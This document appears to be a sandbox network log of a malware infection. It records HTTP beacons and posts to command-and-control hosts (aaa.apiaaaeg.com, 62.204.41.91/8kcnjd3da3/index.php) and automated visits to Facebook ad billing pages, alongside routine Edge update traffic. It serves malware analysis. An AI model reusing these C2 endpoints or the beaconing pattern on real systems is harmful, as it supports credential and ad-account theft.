https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: XL9tH6e8WLEHsK/eDobfbMndKs4JBxkN7HeqI7KNFXvMlFtVahSB6DCt5V5jp0BXGap09MIboLLhX7ObMMNoBA==
Date: Sat, 31 Dec 2022 00:06:32 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
-
Remote address:45.66.159.18:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:45.66.159.18:80RequestPOST /check/?sid=106451&key=794663922c5a3ab65124c9da302a21a4 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Content-Length: 252
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:157.240.247.35:443RequestGET /ads/manager/account_settings/account_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 302 Found
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 5l2ICRKzFOY0FV+m/kKVOleHxWxAcY18CZ7TEWWiRSK5OmZ7YVa+IuZNMPgcOg3P9Z5xFZhcyDX88PC7xrnw9g==
Date: Sat, 31 Dec 2022 00:06:33 GMT
Priority: u=3,i
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
GEThttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingE5E8.exeRemote address:157.240.247.35:443RequestGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: rNSsbB3+3RxODJG8zeMTMklzy1eBvUQN/Hip1Ve5dMPWPg3O15s/UacGfq5SDbG4kO094LHSz04FFOWKiXmtlQ==
Date: Sat, 31 Dec 2022 00:06:34 GMT
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
-
Remote address:62.204.41.91:80RequestPOST /8kcnjd3da3/index.php HTTP/1.1
Host: 62.204.41.91
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Refresh: 0; url = Login.php
-
Remote address:45.66.159.18:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:45.66.159.18:80RequestPOST /check/?sid=106461&key=3531fa6abe14fd1549532e8aa6cb6cf3 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Content-Length: 252
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:8.8.8.8:53Requestmsedge.b.tlu.dl.delivery.mp.microsoft.comIN AResponsemsedge.b.tlu.dl.delivery.mp.microsoft.comIN CNAMEcdp-tlu-shim.trafficmanager.netcdp-tlu-shim.trafficmanager.netIN CNAMEdl.delivery.mp.microsoft.com.c.footprint.netdl.delivery.mp.microsoft.com.c.footprint.netIN A8.247.211.254dl.delivery.mp.microsoft.com.c.footprint.netIN A8.247.210.254dl.delivery.mp.microsoft.com.c.footprint.netIN A8.238.177.126
-
Remote address:8.8.8.8:53Requestmsedge.b.tlu.dl.delivery.mp.microsoft.comIN AResponsemsedge.b.tlu.dl.delivery.mp.microsoft.comIN CNAMEcdp-tlu-shim.trafficmanager.netcdp-tlu-shim.trafficmanager.netIN CNAMEdl.delivery.mp.microsoft.com.c.footprint.netdl.delivery.mp.microsoft.com.c.footprint.netIN A8.238.23.126dl.delivery.mp.microsoft.com.c.footprint.netIN A8.238.23.254dl.delivery.mp.microsoft.com.c.footprint.netIN A8.238.21.126
-
HEADhttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestHEAD /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/x-chrome-extension
Content-Length: 22479
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630417
Accept-Ranges: bytes
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=0-1119
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 1120
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630417
Content-Range: bytes 0-1119/22479
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=1120-1135
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 16
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630423
Content-Range: bytes 1120-1135/22479
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=1136-1179
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 44
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630428
Content-Range: bytes 1136-1179/22479
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=1180-6640
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 5461
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630429
Content-Range: bytes 1180-6640/22479
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=6641-19943
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 13303
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630430
Content-Range: bytes 6641-19943/22479
-
GEThttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3dRemote address:8.247.211.254:80RequestGET /filestreamingservice/files/6ed979ea-c9fe-4a28-9b60-764d331a0d2b?P1=1672731919&P2=404&P3=2&P4=SF%2fqFR%2fYrnm52Kzxh3nuqlEKfmcxI7v9XlA25tw03z9%2b7Lw82k4AhZuAH2LPXkKLbEFzhoYzHl7MXDlMyC%2fWLg%3d%3d HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 18 Nov 2022 23:18:54 GMT
Range: bytes=19944-22478
User-Agent: Microsoft BITS/7.8
Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
ResponseHTTP/1.1 206 Partial Content
Content-Type: application/x-chrome-extension
Content-Length: 2535
Connection: keep-alive
Cache-Control: public, max-age=17280000
ETag: "TGwcNb6VHVq8/1sA7rtXdMR/ABM="
Last-Modified: Fri, 18 Nov 2022 23:18:54 GMT
Server: Microsoft-IIS/10.0
MS-CorrelationId: de22465d-2f3d-4fa9-ac3b-b4b0f2313373
MS-CV: 0kih20ixt1hm5t0y3ythk1.0.1.1.4.1.1.1.0
MS-RequestId: 6f15d6be-9fd8-4f3d-b896-ba855904210b
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Azure-Ref-OriginShield: Ref A: A03AD1E9A01D4C04950C13E521DDF76A Ref B: BL2EDGE2907 Ref C: 2022-11-18T23:28:14Z
X-MSEdge-Ref: Ref A: B33A2697F509430AA57E432B910A7E70 Ref B: BN3EDGE0408 Ref C: 2022-11-18T23:28:14Z
X-Powered-By: ASP.NET,ARR/3.0,ASP.NET
Expires: Tue, 06 Jun 2023 23:39:38 GMT
X-CID: 3
X-CCC: NL
MSREGION: EMEA
Age: 3630431
Content-Range: bytes 19944-22478/22479
-
